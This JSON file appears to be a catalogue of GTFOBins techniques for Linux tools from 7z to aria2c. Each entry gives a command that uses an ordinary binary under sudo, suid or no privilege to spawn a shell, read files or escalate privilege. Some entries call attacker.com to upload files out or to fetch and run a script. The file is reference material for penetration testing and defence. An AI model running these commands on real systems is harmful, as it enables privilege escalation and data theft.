techniques.json (2972573B)
1 [{"id":"gtfo:7z:file-read:0:sudo","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/7z/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:7z:file-read:0:unprivileged","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/7z/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:R:shell:0:sudo","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/R/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:R:shell:0:suid","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/R/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:R:shell:0:unprivileged","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/R/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aa-exec:shell:0:sudo","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aa-exec:shell:0:suid","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aa-exec:shell:0:unprivileged","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:download:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:download:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:download:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:upload:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:upload:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:upload:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:acr:command:0:sudo","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/acr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:acr:command:0:suid","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/acr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:acr:command:0:unprivileged","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/acr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:agetty:shell:0:suid","toolId":"gtfo:agetty","toolName":"agetty","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"agetty -l /bin/sh -o -p -a root tty","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/agetty/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:alpine:file-read:0:sudo","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/alpine/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:alpine:file-read:0:suid","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/alpine/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:alpine:file-read:0:unprivileged","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/alpine/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-playbook:shell:0:sudo","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-playbook:shell:0:unprivileged","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-test:shell:0:sudo","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-test:shell:0:unprivileged","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aoss:shell:0:sudo","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aoss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aoss:shell:0:unprivileged","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aoss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:0:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:0:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:0:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:1:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:1:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:1:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2ctl:file-read:0:sudo","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2ctl:file-read:0:unprivileged","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apport-cli:inherit:0:unprivileged","toolId":"gtfo:apport-cli","toolName":"apport-cli","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apport-cli -f\n1\n2\nv","description":"The terminal interface expects some choices in order to spawn tha pager.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apport-cli/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apt-get:inherit:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:inherit:0:unprivileged","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:0:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:1:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:1:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:aptitude:inherit:0:sudo","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aptitude/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aptitude:inherit:0:unprivileged","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aptitude/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ar:file-read:0:sudo","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ar:file-read:0:suid","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ar:file-read:0:unprivileged","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arch-nspawn:shell:0:sudo","toolId":"gtfo:arch-nspawn","toolName":"arch-nspawn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir -p ./etc/\ngrep -oP \"^CHROOT_VERSION='\\K[^']+\" /usr/share/devtools/lib/archroot.sh >.arch-chroot\ntouch ./etc/pacman.conf\necho 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf\narch-nspawn .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:1:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed 